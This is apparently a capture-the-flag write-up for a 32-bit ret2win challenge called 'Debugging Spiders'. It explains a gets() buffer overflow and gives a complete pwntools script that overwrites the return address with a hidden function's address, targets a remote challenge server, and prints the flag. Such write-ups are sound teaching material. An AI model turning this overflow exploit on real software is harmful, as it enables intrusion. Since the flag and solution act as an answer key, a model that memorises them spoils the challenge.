Debugging Spiders
ret2win
Problem
Solution
Basic file check and checksec reveals that the binary is ELF 32-Bit, dynamically linked not stripped and the protection enabled is NX and partial RELRO
Looking at the decompiled main function, its calling the gets() function which don't specity how much buffer it will read. So a Buffer Overflow is a possibility here.
We also noticed that there's a secret function that's never called named secret_spider(). Taking a look at it, it seems obvious that this is the win function.
Next we use to gdb-pwndbg's cyclic tool to determine the offset to the EIP and it was found at 64 bytes. Next I have written the following code to get the flag. Run with python solve.py REMOTE to run it againts the server
#!user/bin/python3
from pwn import *
# =========================================================
# SETUP
# =========================================================
exe = './spiders'
elf = context.binary = ELF(exe, checksec=True)
context.log_level = 'debug'
host = '34.124.192.13'
port = 27302
def start(argv=[], *a, **kw):
if args.GDB: # Set GDBscript below
return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw)
elif args.REMOTE: # ('server', 'port')
return remote(host, port, *a, **kw)
else: # Run locally
return process([exe] + argv, *a, **kw)
gdbscript = '''
init-pwndbg
continue
'''.format(**locals())
io = start()
# =========================================================
# ADDRESSES
# =========================================================
win = 0x080491a6
# =========================================================
# EXPLOITS
# =========================================================
# Got manually through cyclic gdb-pwndbg
offset = 64
# flattening payload here
payload = flat({
offset: [
win
]
})
# sending payload
io.sendline(payload)
io.interactive()Flag
FindITCTF{Ju57_7h3_W4y_1t_iz}
Last updated